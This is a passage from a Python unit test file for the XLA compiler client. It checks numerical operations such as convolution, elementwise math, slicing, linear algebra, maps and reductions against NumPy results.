strides, pads, lhs_dilation, rhs_dilation,
dimension_numbers)
result = np.array([[[[0., 0., 0.],
[10., 20., 0.],
[0., 0., 0.],
[40., 50., 0.]]]])
self._ExecuteAndCompareClose(c, expected=np.transpose(result, (1, 3, 0, 2)))
def testConvGeneralDilatedGroupedConvolutionF32(self):
c = self._NewComputation()
a = lambda *dims: np.arange(np.prod(dims)).reshape(dims).astype("float32")
lhs = a(1, 2, 2, 3)
rhs = a(2, 1, 1, 2) * 10
strides = [1, 1]
pads = [(1, 0), (0, 1)]
lhs_dilation = (2, 1)
rhs_dilation = (1, 1)
dimension_numbers = ("NCHW", "OIHW", "NCHW")
feature_group_count = 2
c.ConvGeneralDilated(c.Constant(lhs), c.Constant(rhs),
strides, pads, lhs_dilation, rhs_dilation,
dimension_numbers, feature_group_count)
result = np.array([[[[0., 0., 0.],
[10., 20., 0.],
[0., 0., 0.],
[40., 50., 0.]],
[[0., 0., 0.],
[330., 380., 160.],
[0., 0., 0.],
[480., 530., 220.]]]])
self._ExecuteAndCompareClose(c, expected=result)
def testBooleanNot(self):
c = self._NewComputation()
arr = NumpyArrayBool([True, False, True])
c.Not(c.Constant(arr))
self._ExecuteAndCompareClose(c, expected=~arr)
def testExp(self):
c = self._NewComputation()
arr = NumpyArrayF32([3.3, 12.1])
c.Exp(c.Constant(arr))
self._ExecuteAndCompareClose(c, expected=np.exp(arr))
def testExpm1(self):
c = self._NewComputation()
arr = NumpyArrayF32([3.3, 12.1])
c.Expm1(c.Constant(arr))
self._ExecuteAndCompareClose(c, expected=np.expm1(arr))
def testRound(self):
c = self._NewComputation()
arr = NumpyArrayF32([3.3, 12.1])
c.Round(c.Constant(arr))
self._ExecuteAndCompareClose(c, expected=np.round(arr))
def testLog(self):
c = self._NewComputation()
arr = NumpyArrayF32([3.3, 12.1])
c.Log(c.Constant(arr))
self._ExecuteAndCompareClose(c, expected=np.log(arr))
def testLog1p(self):
c = self._NewComputation()
arr = NumpyArrayF32([3.3, 12.1])
c.Log1p(c.Constant(arr))
self._ExecuteAndCompareClose(c, expected=np.log1p(arr))
def testNeg(self):
c = self._NewComputation()
arr = NumpyArrayF32([3.3, 12.1])
c.Neg(c.Constant(arr))
self._ExecuteAndCompareClose(c, expected=-arr)
def testFloor(self):
c = self._NewComputation()
arr = NumpyArrayF32([3.3, 12.1])
c.Floor(c.Constant(arr))
self._ExecuteAndCompareClose(c, expected=np.floor(arr))
def testCeil(self):
c = self._NewComputation()
arr = NumpyArrayF32([3.3, 12.1])
c.Ceil(c.Constant(arr))
self._ExecuteAndCompareClose(c, expected=np.ceil(arr))
def testAbs(self):
c = self._NewComputation()
arr = NumpyArrayF32([3.3, -12.1, 2.4, -1.])
c.Abs(c.Constant(arr))
self._ExecuteAndCompareClose(c, expected=np.abs(arr))
def testTanh(self):
c = self._NewComputation()
arr = NumpyArrayF32([3.3, 12.1])
c.Tanh(c.Constant(arr))
self._ExecuteAndCompareClose(c, expected=np.tanh(arr))
def testTrans(self):
def _TransposeAndTest(array):
c = self._NewComputation()
c.Trans(c.Constant(array))
self._ExecuteAndCompareClose(c, expected=array.T)
# Test square and non-square matrices in both default (C) and F orders.
for array_fun in [NumpyArrayF32, NumpyArrayF64]:
_TransposeAndTest(array_fun([[1, 2, 3], [4, 5, 6]]))
_TransposeAndTest(array_fun([[1, 2, 3], [4, 5, 6]], order="F"))
_TransposeAndTest(array_fun([[1, 2], [4, 5]]))
_TransposeAndTest(array_fun([[1, 2], [4, 5]], order="F"))
def testTranspose(self):
def _TransposeAndTest(array, permutation):
c = self._NewComputation()
c.Transpose(c.Constant(array), permutation)
expected = np.transpose(array, permutation)
self._ExecuteAndCompareClose(c, expected=expected)
_TransposeAndTest(NumpyArrayF32([[1, 2, 3], [4, 5, 6]]), [0, 1])
_TransposeAndTest(NumpyArrayF32([[1, 2, 3], [4, 5, 6]]), [1, 0])
_TransposeAndTest(NumpyArrayF32([[1, 2], [4, 5]]), [0, 1])
_TransposeAndTest(NumpyArrayF32([[1, 2], [4, 5]]), [1, 0])
arr = np.random.RandomState(0).randn(2, 3, 4).astype(np.float32)
for permutation in itertools.permutations(range(arr.ndim)):
_TransposeAndTest(arr, permutation)
_TransposeAndTest(np.asfortranarray(arr), permutation)
def testEq(self):
c = self._NewComputation()
c.Eq(
c.Constant(NumpyArrayS32([1, 2, 3, 4])),
c.Constant(NumpyArrayS32([4, 2, 3, 1])))
self._ExecuteAndCompareExact(c, expected=[False, True, True, False])
def testNe(self):
c = self._NewComputation()
c.Ne(
c.Constant(NumpyArrayS32([1, 2, 3, 4])),
c.Constant(NumpyArrayS32([4, 2, 3, 1])))
self._ExecuteAndCompareExact(c, expected=[True, False, False, True])
c.Ne(
c.Constant(NumpyArrayF32([-2.0, 0.0,
float("nan"),
float("nan")])),
c.Constant(NumpyArrayF32([2.0, -0.0, 1.0, float("nan")])))
self._ExecuteAndAssertWith(
np.testing.assert_allclose, c, (), expected=[True, False, True, True])
def testGt(self):
c = self._NewComputation()
c.Gt(
c.Constant(NumpyArrayS32([1, 2, 3, 4, 9])),
c.Constant(NumpyArrayS32([1, 0, 2, 7, 12])))
self._ExecuteAndCompareExact(c, expected=[False, True, True, False, False])
def testGe(self):
c = self._NewComputation()
c.Ge(
c.Constant(NumpyArrayS32([1, 2, 3, 4, 9])),
c.Constant(NumpyArrayS32([1, 0, 2, 7, 12])))
self._ExecuteAndCompareExact(c, expected=[True, True, True, False, False])
def testLt(self):
c = self._NewComputation()
c.Lt(
c.Constant(NumpyArrayS32([1, 2, 3, 4, 9])),
c.Constant(NumpyArrayS32([1, 0, 2, 7, 12])))
self._ExecuteAndCompareExact(c, expected=[False, False, False, True, True])
def testLe(self):
c = self._NewComputation()
c.Le(
c.Constant(NumpyArrayS32([1, 2, 3, 4, 9])),
c.Constant(NumpyArrayS32([1, 0, 2, 7, 12])))
self._ExecuteAndCompareExact(c, expected=[True, False, False, True, True])
def testMax(self):
c = self._NewComputation()
c.Max(
c.Constant(NumpyArrayF32([1.0, 2.0, 3.0, 4.0, 9.0])),
c.Constant(NumpyArrayF32([1.0, 0.0, 2.0, 7.0, 12.0])))
self._ExecuteAndCompareExact(c, expected=[1.0, 2.0, 3.0, 7.0, 12.0])
def testMaxExplicitBroadcastDim0(self):
c = self._NewComputation()
c.Max(
c.Constant(NumpyArrayF32([[1, 2, 3], [4, 5, 6], [7, 8, 9]])),
c.Constant(NumpyArrayF32([3, 4, 5])),
broadcast_dimensions=(0,))
self._ExecuteAndCompareExact(c, expected=[[3, 3, 3], [4, 5, 6], [7, 8, 9]])
def testMaxExplicitBroadcastDim1(self):
c = self._NewComputation()
c.Max(
c.Constant(NumpyArrayF32([[1, 2, 3], [4, 5, 6], [7, 8, 9]])),
c.Constant(NumpyArrayF32([3, 4, 5])),
broadcast_dimensions=(1,))
self._ExecuteAndCompareExact(c, expected=[[3, 4, 5], [4, 5, 6], [7, 8, 9]])
def testMin(self):
c = self._NewComputation()
c.Min(
c.Constant(NumpyArrayF32([1.0, 2.0, 3.0, 4.0, 9.0])),
c.Constant(NumpyArrayF32([1.0, 0.0, 2.0, 7.0, 12.0])))
self._ExecuteAndCompareExact(c, expected=[1.0, 0.0, 2.0, 4.0, 9.0])
def testPad(self):
c = self._NewComputation()
c.Pad(
c.Constant(NumpyArrayF32([[1.0, 2.0], [3.0, 4.0]])),
c.Constant(NumpyArrayF32(0.0)),
[(1, 2, 1), (0, 1, 0)])
self._ExecuteAndCompareClose(c, expected=[[0.0, 0.0, 0.0],
[1.0, 2.0, 0.0],
[0.0, 0.0, 0.0],
[3.0, 4.0, 0.0],
[0.0, 0.0, 0.0],
[0.0, 0.0, 0.0]])
def testPadWithPaddingConfig(self):
c = self._NewComputation()
padding_config = xla_client.xla_data_pb2.PaddingConfig()
for lo, hi, interior in [(1, 2, 1), (0, 1, 0)]:
dimension = padding_config.dimensions.add()
dimension.edge_padding_low = lo
dimension.edge_padding_high = hi
dimension.interior_padding = interior
c.Pad(
c.Constant(NumpyArrayF32([[1.0, 2.0], [3.0, 4.0]])),
c.Constant(NumpyArrayF32(0.0)),
padding_config)
self._ExecuteAndCompareClose(c, expected=[[0.0, 0.0, 0.0],
[1.0, 2.0, 0.0],
[0.0, 0.0, 0.0],
[3.0, 4.0, 0.0],
[0.0, 0.0, 0.0],
[0.0, 0.0, 0.0]])
def testReshape(self):
c = self._NewComputation()
c.Reshape(
c.Constant(NumpyArrayS32([[1, 2], [3, 4], [5, 6]])),
dimensions=[0, 1],
new_sizes=[2, 3])
self._ExecuteAndCompareExact(c, expected=[[1, 2, 3], [4, 5, 6]])
def testCollapse(self):
c = self._NewComputation()
c.Collapse(
c.Constant(NumpyArrayS32([[[1, 2], [3, 4]], [[5, 6], [7, 8]]])),
dimensions=[1, 2])
self._ExecuteAndCompareExact(c, expected=[[1, 2, 3, 4], [5, 6, 7, 8]])
def testRev(self):
c = self._NewComputation()
c.Rev(
c.Constant(NumpyArrayS32([[[1, 2], [3, 4]], [[5, 6], [7, 8]]])),
dimensions=[0, 2])
self._ExecuteAndCompareExact(
c, expected=[[[6, 5], [8, 7]], [[2, 1], [4, 3]]])
def testClampF32(self):
c = self._NewComputation()
c.Clamp(
c.Constant(NumpyArrayF32(-1)),
c.Constant(NumpyArrayF32([-2, -1, 0, 1, 2, 3])),
c.Constant(NumpyArrayF32(2)))
self._ExecuteAndCompareExact(c, expected=[-1, -1, 0, 1, 2, 2])
# TODO(b/72689392): re-enable when bug S32 resolved
def DISABLED_testClampS32(self):
c = self._NewComputation()
c.Clamp(
c.Constant(NumpyArrayS32(-1)),
c.Constant(NumpyArrayS32([-2, -1, 0, 1, 2, 3])),
c.Constant(NumpyArrayS32(2)))
self._ExecuteAndCompareExact(c, expected=[-1, 0, 1, 2, 2])
def testSelect(self):
c = self._NewComputation()
c.Select(
c.Constant(NumpyArrayBool([True, False, False, True, False])),
c.Constant(NumpyArrayS32([1, 2, 3, 4, 5])),
c.Constant(NumpyArrayS32([-1, -2, -3, -4, -5])))
self._ExecuteAndCompareExact(c, expected=[1, -2, -3, 4, -5])
def testSlice(self):
c = self._NewComputation()
c.Slice(
c.Constant(NumpyArrayS32([[1, 2, 3], [4, 5, 6], [7, 8, 9]])), [1, 0],
[3, 2])
self._ExecuteAndCompareExact(c, expected=[[4, 5], [7, 8]])
def testSliceInDim(self):
c = self._NewComputation()
c.SliceInDim(
c.Constant(NumpyArrayS32([[1, 2, 3], [4, 5, 6], [7, 8, 9]])),
start_index=1,
limit_index=2,
stride=1,
dimno=1)
self._ExecuteAndCompareExact(c, expected=[[2], [5], [8]])
c.SliceInDim(
c.Constant(NumpyArrayS32([[1, 2, 3], [4, 5, 6], [7, 8, 9]])),
start_index=0,
limit_index=3,
stride=2,
dimno=0)
self._ExecuteAndCompareExact(c, expected=[[1, 2, 3], [7, 8, 9]])
def testDynamicSlice(self):
c = self._NewComputation()
c.DynamicSlice(
c.Constant(NumpyArrayS32([[1, 2, 3], [4, 5, 6], [7, 8, 9]])),
c.Constant(NumpyArrayS32([1, 0])), [2, 2])
self._ExecuteAndCompareExact(c, expected=[[4, 5], [7, 8]])
def testDynamicUpdateSlice(self):
c = self._NewComputation()
c.DynamicUpdateSlice(
c.Constant(NumpyArrayS32([[1, 2, 3], [4, 5, 6], [7, 8, 9]])),
c.Constant(NumpyArrayS32([[1, 2], [3, 4]])),
c.Constant(NumpyArrayS32([1, 1])))
self._ExecuteAndCompareExact(c, expected=[[1, 2, 3], [4, 1, 2], [7, 3, 4]])
def testTuple(self):
c = self._NewComputation()
c.Tuple(
c.ConstantS32Scalar(42), c.Constant(NumpyArrayF32([1.0, 2.0])),
c.Constant(NumpyArrayBool([True, False, False, True])))
result = c.Build().Compile().ExecuteWithPythonValues()
self.assertIsInstance(result, tuple)
np.testing.assert_equal(result[0], 42)
np.testing.assert_allclose(result[1], [1.0, 2.0])
np.testing.assert_equal(result[2], [True, False, False, True])
def testGetTupleElement(self):
c = self._NewComputation()
c.GetTupleElement(
c.Tuple(
c.ConstantS32Scalar(42), c.Constant(NumpyArrayF32([1.0, 2.0])),
c.Constant(NumpyArrayBool([True, False, False, True]))), 1)
self._ExecuteAndCompareClose(c, expected=[1.0, 2.0])
def testBroadcast(self):
c = self._NewComputation()
c.Broadcast(c.Constant(NumpyArrayS32([10, 20, 30, 40])), sizes=(3,))
self._ExecuteAndCompareExact(
c, expected=[[10, 20, 30, 40], [10, 20, 30, 40], [10, 20, 30, 40]])
def testBroadcastInDim(self):
c = self._NewComputation()
c.BroadcastInDim(c.Constant(NumpyArrayS32([1, 2])), [2, 2], [0])
self._ExecuteAndCompareExact(c, expected=[[1, 1], [2, 2]])
c.BroadcastInDim(c.Constant(NumpyArrayS32([1, 2])), [2, 2], [1])
self._ExecuteAndCompareExact(c, expected=[[1, 2], [1, 2]])
def testRngNormal(self):
shape = (2, 3)
c = self._NewComputation()
c.RngNormal(c.Constant(NumpyArrayF32(0.)), c.Constant(NumpyArrayF32(1.)),
dims=shape)
result = c.Build().Compile().ExecuteWithPythonValues()
# since the result is random, we just check shape and uniqueness
self.assertEqual(result.shape, shape)
self.assertEqual(len(np.unique(result)), np.prod(shape))
def testRngUniformF32(self):
lo, hi = 2., 4.
shape = (2, 3)
c = self._NewComputation()
c.RngUniform(c.Constant(NumpyArrayF32(lo)), c.Constant(NumpyArrayF32(hi)),
dims=shape)
result = c.Build().Compile().ExecuteWithPythonValues()
# since the result is random, we just check shape, uniqueness, and range
self.assertEqual(result.shape, shape)
self.assertEqual(len(np.unique(result)), np.prod(shape))
self.assertTrue(np.all(lo <= result))
self.assertTrue(np.all(result < hi))
def testRngUniformS32(self):
lo, hi = 2, 4
shape = (2, 3)
c = self._NewComputation()
c.RngUniform(c.Constant(NumpyArrayS32(lo)), c.Constant(NumpyArrayS32(hi)),
dims=shape)
result = c.Build().Compile().ExecuteWithPythonValues()
# since the result is random, we just check shape, integrality, and range
self.assertEqual(result.shape, shape)
self.assertEqual(result.dtype, np.int32)
self.assertTrue(np.all(lo <= result))
self.assertTrue(np.all(result < hi))
def testCholesky(self):
l = np.array([[4, 0, 0, 0], [6, 5, 0, 0], [2, 14, 16, 0], [3, 6, 1, 4]],
dtype=np.float32)
c = self._NewComputation()
c.Cholesky(c.Constant(np.dot(l, l.T)))
self._ExecuteAndCompareClose(c, expected=l, rtol=1e-4)
def testQR(self):
a = np.array(
[[4, 6, 8, 10], [6, 45, 54, 63], [8, 54, 146, 166], [10, 63, 166, 310]],
dtype=np.float32)
c = self._NewComputation()
c.QR(c.Constant(a), full_matrices=True)
q, r = self._Execute(c, ())
np.testing.assert_allclose(np.dot(q, r), a, rtol=1e-4)
def testTriangularSolve(self):
a_vals = np.array(
[[2, 0, 0, 0], [3, 6, 0, 0], [4, 7, 9, 0], [5, 8, 10, 11]],
dtype=np.float32)
b_vals = np.array([[1, 2, 3, 4], [5, 6, 7, 8], [9, 10, 11, 12]],
dtype=np.float32)
c = self._NewComputation()
c.TriangularSolve(c.Constant(a_vals), c.Constant(b_vals), left_side=False,
lower=True, transpose_a=True)
self._ExecuteAndCompareClose(c, expected=np.array([
[0.5, 0.08333334, 0.04629629, 0.03367003],
[2.5, -0.25, -0.1388889, -0.1010101],
[4.5, -0.58333331, -0.32407406, -0.23569024],
], dtype=np.float32), rtol=1e-4)
def testIsConstant(self):
c = self._NewComputation()
a = c.ConstantS32Scalar(3)
b = c.ConstantS32Scalar(1)
x = c.ParameterFromNumpy(NumpyArrayS32(0))
const_expr = c.Sub(b, a)
non_const_expr = c.Mul(const_expr, x)
self.assertTrue(c.IsConstant(const_expr))
self.assertFalse(c.IsConstant(non_const_expr))
# self.assertTrue(c.IsConstant(c.Sub(c.Add(x, a), x))) # TODO(b/77245564)
class EmbeddedComputationsTest(LocalComputationTest):
"""Tests for XLA graphs with embedded computations (such as maps)."""
def _CreateConstantS32Computation(self):
"""Computation (f32) -> s32 that returns a constant 1 for any input."""
c = self._NewComputation("constant_s32_one")
# TODO(eliben): consider adding a nicer way to create new parameters without
# having to create dummy Numpy arrays or populating Shape messages. Perhaps
# we need our own (Python-client-own) way to represent Shapes conveniently.
c.ParameterFromNumpy(NumpyArrayF32(0))
c.ConstantS32Scalar(1)
return c.Build()
def _CreateConstantS64Computation(self):
"""Computation (f64) -> s64 that returns a constant 1 for any input."""
c = self._NewComputation("constant_s64_one")
# TODO(eliben): consider adding a nicer way to create new parameters without
# having to create dummy Numpy arrays or populating Shape messages. Perhaps
# we need our own (Python-client-own) way to represent Shapes conveniently.
c.ParameterFromNumpy(NumpyArrayF64(0))
c.ConstantS64Scalar(1)
return c.Build()
def _CreateConstantF32Computation(self):
"""Computation (f32) -> f32 that returns a constant 1.0 for any input."""
c = self._NewComputation("constant_f32_one")
c.ParameterFromNumpy(NumpyArrayF32(0))
c.ConstantF32Scalar(1.0)
return c.Build()
def _CreateConstantF64Computation(self):
"""Computation (f64) -> f64 that returns a constant 1.0 for any input."""
c = self._NewComputation("constant_f64_one")
c.ParameterFromNumpy(NumpyArrayF64(0))
c.ConstantF64Scalar(1.0)
return c.Build()
def _CreateMulF32By2Computation(self):
"""Computation (f32) -> f32 that multiplies its parameter by 2."""
c = self._NewComputation("mul_f32_by2")
c.Mul(c.ParameterFromNumpy(NumpyArrayF32(0)), c.ConstantF32Scalar(2.0))
return c.Build()
def _CreateMulF32ByParamComputation(self):
"""Computation (f32) -> f32 that multiplies one parameter by the other."""
c = self._NewComputation("mul_f32_by_param")
c.Mul(c.ParameterFromNumpy(NumpyArrayF32(0)),
c.ParameterFromNumpy(NumpyArrayF32(0)))
return c.Build()
def _CreateMulF64By2Computation(self):
"""Computation (f64) -> f64 that multiplies its parameter by 2."""
c = self._NewComputation("mul_f64_by2")
c.Mul(c.ParameterFromNumpy(NumpyArrayF64(0)), c.ConstantF64Scalar(2.0))
return c.Build()
def _CreateBinaryAddF32Computation(self):
"""Computation (f32, f32) -> f32 that adds its two parameters."""
c = self._NewComputation("add_param0_by_param1")
c.Add(
c.ParameterFromNumpy(NumpyArrayF32(0)),
c.ParameterFromNumpy(NumpyArrayF32(0)))
return c.Build()
def _CreateBinaryAddF64Computation(self):
"""Computation (f64, f64) -> f64 that adds its two parameters."""
c = self._NewComputation("add_param0_by_param1")
c.Add(
c.ParameterFromNumpy(NumpyArrayF64(0)),
c.ParameterFromNumpy(NumpyArrayF64(0)))
return c.Build()
def _CreateBinaryDivF32Computation(self):
"""Computation (f32, f32) -> f32 that divides its two parameters."""
c = self._NewComputation("div_param0_by_param1")
c.Div(
c.ParameterFromNumpy(NumpyArrayF32(0)),
c.ParameterFromNumpy(NumpyArrayF32(0)))
return c.Build()
def _CreateBinaryDivF64Computation(self):
"""Computation (f64, f64) -> f64 that divides its two parameters."""
c = self._NewComputation("div_param0_by_param1")
c.Div(
c.ParameterFromNumpy(NumpyArrayF64(0)),
c.ParameterFromNumpy(NumpyArrayF64(0)))
return c.Build()
def _CreateTestF32Lt10Computation(self):
"""Computation (f32) -> bool that tests if its parameter is less than 10."""
c = self._NewComputation("test_f32_lt_10")
c.Lt(c.ParameterFromNumpy(NumpyArrayF32(0)), c.ConstantF32Scalar(10.))
return c.Build()
def _CreateTestF64Lt10Computation(self):
"""Computation (f64) -> bool that tests if its parameter is less than 10."""
c = self._NewComputation("test_f64_lt_10")
c.Lt(c.ParameterFromNumpy(NumpyArrayF64(0)), c.ConstantF64Scalar(10.))
return c.Build()
def _CreateBinaryGeF32Computation(self):
"""Computation (f32, f32) -> bool that tests first_param >= second_param."""
c = self._NewComputation("param0_lt_param1")
c.Ge(c.ParameterFromNumpy(NumpyArrayF32(0)),
c.ParameterFromNumpy(NumpyArrayF32(0)))
return c.Build()
def _CreateBinaryGeF64Computation(self):
"""Computation (f64, f64) -> bool that tests first_param >= second_param."""
c = self._NewComputation("param0_lt_param1")
c.Ge(c.ParameterFromNumpy(NumpyArrayF64(0)),
c.ParameterFromNumpy(NumpyArrayF64(0)))
return c.Build()
def _MakeSample3DArrayF32(self):
return NumpyArrayF32([[[1, 2, 3], [4, 5, 6]], [[1, 2, 3], [4, 5, 6]],
[[1, 2, 3], [4, 5, 6]], [[1, 2, 3], [4, 5, 6]]])
def _MakeSample3DArrayF64(self):
return NumpyArrayF64([[[1, 2, 3], [4, 5, 6]], [[1, 2, 3], [4, 5, 6]],
[[1, 2, 3], [4, 5, 6]], [[1, 2, 3], [4, 5, 6]]])
def testCallF32(self):
c = self._NewComputation()
c.Call(
self._CreateMulF32By2Computation(),
operands=(c.ConstantF32Scalar(5.0),))
self._ExecuteAndCompareClose(c, expected=10.0)
def testCallF64(self):
c = self._NewComputation()
c.Call(
self._CreateMulF64By2Computation(),
operands=(c.ConstantF64Scalar(5.0),))
self._ExecuteAndCompareClose(c, expected=10.0)
def testMapEachElementToS32Constant(self):
c = self._NewComputation()
c.Map([c.Constant(NumpyArrayF32([1.0, 2.0, 3.0, 4.0]))],
self._CreateConstantS32Computation(), [0])
self._ExecuteAndCompareExact(c, expected=[1, 1, 1, 1])
def testMapEachElementToS64Constant(self):
c = self._NewComputation()
c.Map([c.Constant(NumpyArrayF64([1.0, 2.0, 3.0, 4.0]))],
self._CreateConstantS64Computation(), [0])
self._ExecuteAndCompareExact(c, expected=[1, 1, 1, 1])
def testMapMulBy2F32(self):
c = self._NewComputation()
c.Map([c.Constant(NumpyArrayF32([1.0, 2.0, 3.0, 4.0]))],
self._CreateMulF32By2Computation(), [0])
self._ExecuteAndCompareClose(c, expected=[2.0, 4.0, 6.0, 8.0])
def testMapMulBy2F64(self):
c = self._NewComputation()
c.Map([c.Constant(NumpyArrayF64([1.0, 2.0, 3.0, 4.0]))],
self._CreateMulF64By2Computation(), [0])
self._ExecuteAndCompareClose(c, expected=[2.0, 4.0, 6.0, 8.0])
def testSimpleMapChainF32(self):
# Chains a map of constant-f32 with a map of mul-by-2
c = self._NewComputation()
const_f32 = c.Map([c.Constant(NumpyArrayF32([1.0, 2.0, 3.0, 4.0]))],
self._CreateConstantF32Computation(), [0])
c.Map([const_f32], self._CreateMulF32By2Computation(), [0])
self._ExecuteAndCompareClose(c, expected=[2.0, 2.0, 2.0, 2.0])
def testSimpleMapChainF64(self):
# Chains a map of constant-f64 with a map of mul-by-2
c = self._NewComputation()
const_f64 = c.Map([c.Constant(NumpyArrayF64([1.0, 2.0, 3.0, 4.0]))],
self._CreateConstantF64Computation(), [0])
c.Map([const_f64], self._CreateMulF64By2Computation(), [0])
self._ExecuteAndCompareClose(c, expected=[2.0, 2.0, 2.0, 2.0])
def testDivVectorsWithMapF32(self):
c = self._NewComputation()
c.Map((c.Constant(NumpyArrayF32([1.0, 2.0, 3.0, 4.0])),
c.Constant(NumpyArrayF32([5.0, 5.0, 4.0, 4.0]))),
self._CreateBinaryDivF32Computation(), [0])
self._ExecuteAndCompareClose(c, expected=[0.2, 0.4, 0.75, 1.0])
def testDivVectorsWithMapF64(self):
c = self._NewComputation()
c.Map((c.Constant(NumpyArrayF64([1.0, 2.0, 3.0, 4.0])),
c.Constant(NumpyArrayF64([5.0, 5.0, 4.0, 4.0]))),
self._CreateBinaryDivF64Computation(), [0])
self._ExecuteAndCompareClose(c, expected=[0.2, 0.4, 0.75, 1.0])
def testSelectAndScatterF32(self):
c = self._NewComputation()
c.SelectAndScatter(c.Constant(NumpyArrayF32([[1., 2., 6.], [4., 5., 3.]])),
select=self._CreateBinaryGeF32Computation(),
window_dimensions=(2, 1),
window_strides=(1, 2),
padding=xla_client.PaddingType.VALID,
source=c.Constant(NumpyArrayF32([[0.1, 0.2]])),
init_value=c.Constant(NumpyArrayF32(1)),
scatter=self._CreateBinaryAddF32Computation())
self._ExecuteAndCompareClose(c, expected=[[1., 1., 1.2], [1.1, 1., 1.]])
def testSelectAndScatterF64(self):
c = self._NewComputation()
c.SelectAndScatter(c.Constant(NumpyArrayF64([[1., 2., 6.], [4., 5., 3.]])),
select=self._CreateBinaryGeF64Computation(),
window_dimensions=(2, 1),
window_strides=(1, 2),
padding=xla_client.PaddingType.VALID,
source=c.Constant(NumpyArrayF64([[0.1, 0.2]])),
init_value=c.Constant(NumpyArrayF64(1)),
scatter=self._CreateBinaryAddF64Computation())
self._ExecuteAndCompareClose(c, expected=[[1., 1., 1.2], [1.1, 1., 1.]])
def testReduce1DtoScalarF32(self):
c = self._NewComputation()
c.Reduce(
operand=c.Constant(NumpyArrayF32([1.0, 2.0, 3.0, 4.0])),
init_value=c.ConstantF32Scalar(0),
computation_to_apply=self._CreateBinaryAddF32Computation(),
dimensions=[0])
self._ExecuteAndCompareClose(c, expected=10)
def testReduce1DtoScalarF64(self):
c = self._NewComputation()
c.Reduce(
operand=c.Constant(NumpyArrayF64([1.0, 2.0, 3.0, 4.0])),
init_value=c.ConstantF64Scalar(0),
computation_to_apply=self._CreateBinaryAddF64Computation(),
dimensions=[0])
self._ExecuteAndCompareClose(c, expected=10)
def testReduce2DTo1DDim0F32(self):
input_array = NumpyArrayF32([[1.0, 2.0, 3.0], [4.0, 5.0, 6.0]])
c = self._NewComputation()
c.Reduce(
operand=c.Constant(input_array),
init_value=c.ConstantF32Scalar(0),
computation_to_apply=self._CreateBinaryAddF32Computation(),
dimensions=[0])
self._ExecuteAndCompareClose(c, expected=[5, 7, 9])
def testReduce2DTo1DDim0F64(self):
input_array = NumpyArrayF64([[1.0, 2.0, 3.0], [4.0, 5.0, 6.0]])
c = self._NewComputation()
c.Reduce(
operand=c.Constant(input_array),
init_value=c.ConstantF64Scalar(0),
computation_to_apply=self._CreateBinaryAddF64Computation(),
dimensions=[0])
self._ExecuteAndCompareClose(c, expected=[5, 7, 9])
def testReduce2DTo1DDim1F32(self):
input_array = NumpyArrayF32([[1.0, 2.0, 3.0], [4.0, 5.0, 6.0]])
c = self._NewComputation()
c.Reduce(
operand=c.Constant(input_array),
init_value=c.ConstantF32Scalar(0),
computation_to_apply=self._CreateBinaryAddF32Computation(),
dimensions=[1])
self._ExecuteAndCompareClose(c, expected=[6, 15])
def testReduce2DTo1DDim1F64(self):
input_array = NumpyArrayF64([[1.0, 2.0, 3.0], [4.0, 5.0, 6.0]])
c = self._NewComputation()
c.Reduce(
operand=c.Constant(input_array),
init_value=c.ConstantF64Scalar(0),
computation_to_apply=self._CreateBinaryAddF64Computation(),
dimensions=[1])
self._ExecuteAndCompareClose(c, expected=[6, 15])
def testReduce3DAllPossibleWaysF32(self):
input_array = self._MakeSample3DArrayF32()
def _ReduceAndTest(*dims):
c = self._NewComputation()
c.Reduce(
operand=c.Constant(input_array),
init_value=c.ConstantF32Scalar(0),
computation_to_apply=self._CreateBinaryAddF32Computation(),
dimensions=dims)
self._ExecuteAndCompareClose(
c, expected=np.sum(input_array, axis=tuple(dims)))
_ReduceAndTest(0)
_ReduceAndTest(0, 1)
_ReduceAndTest(0, 2)
_ReduceAndTest(1, 2)
_ReduceAndTest(0, 1, 2)
def testReduce3DAllPossibleWaysF64(self):
input_array = self._MakeSample3DArrayF64()
def _ReduceAndTest(*dims):
c = self._NewComputation()
c.Reduce(
operand=c.Constant(input_array),
init_value=c.ConstantF64Scalar(0),
computation_to_apply=self._CreateBinaryAddF64Computation(),
dimensions=dims)
self._ExecuteAndCompareClose(
c, expected=np.sum(input_array, axis=tuple(dims)))
_ReduceAndTest(0)
_ReduceAndTest(0)
_ReduceAndTest(0, 1)
_ReduceAndTest(0, 2)
_ReduceAndTest(1, 2)
_ReduceAndTest(0, 1, 2)
def testReduceWindowValidUnitStridesF32(self):
input_array = NumpyArrayF32([[1.0, 2.0, 3.0], [4.0, 5.0, 6.0]])
c = self._NewComputation()
c.ReduceWindow(operand=c.Constant(input_array),
init_value=c.ConstantF32Scalar(0),
computation_to_apply=self._CreateBinaryAddF32Computation(),
window_dimensions=(2, 1), window_strides=(1, 1),
padding=xla_client.PaddingType.VALID)
self._ExecuteAndCompareClose(c, expected=[[5., 7., 9.]])
def testReduceWindowSameUnitStridesF32(self):
input_array = NumpyArrayF32([[1.0, 2.0, 3.0], [4.0, 5.0, 6.0]])
c = self._NewComputation()
c.ReduceWindow(operand=c.Constant(input_array),
init_value=c.ConstantF32Scalar(0),
computation_to_apply=self._CreateBinaryAddF32Computation(),
window_dimensions=(2, 1), window_strides=(1, 1),
padding=xla_client.PaddingType.SAME)
self._ExecuteAndCompareClose(c, expected=[[5., 7., 9.], [4., 5., 6.]])
def testReduceWindowValidGeneralStridesF32(self):
input_array = NumpyArrayF32([[1.0, 2.0, 3.0], [4.0, 5.0, 6.0]])
c = self._NewComputation()
c.ReduceWindow(operand=c.Constant(input_array),
init_value=c.ConstantF32Scalar(0),
computation_to_apply=self._CreateBinaryAddF32Computation(),
window_dimensions=(2, 1), window_strides=(1, 2),
padding=xla_client.PaddingType.VALID)
self._ExecuteAndCompareClose(c, expected=[[5., 9.]])
def testReduceWindowValidUnitStridesF64(self):
input_array = NumpyArrayF64([[1.0, 2.0, 3.0], [4.0, 5.0, 6.0]])
c = self._NewComputation()
c.ReduceWindow(operand=c.Constant(input_array),
init_value=c.ConstantF64Scalar(0),
computation_to_apply=self._CreateBinaryAddF64Computation(),
window_dimensions=(2, 1), window_strides=(1, 1),
padding=xla_client.PaddingType.VALID)
self._ExecuteAndCompareClose(c, expected=[[5., 7., 9.]])
def testReduceWindowSameUnitStridesF64(self):
input_array = NumpyArrayF64([[1.0, 2.0, 3.0], [4.0, 5.0, 6.0]])
c = self._NewComputation()
c.ReduceWindow(operand=c.Constant(input_array),
init_value=c.ConstantF64Scalar(0),
computation_to_apply=self._CreateBinaryAddF64Computation(),
window_dimensions=(2, 1), window_strides=(1, 1),
padding=xla_client.PaddingType.SAME)
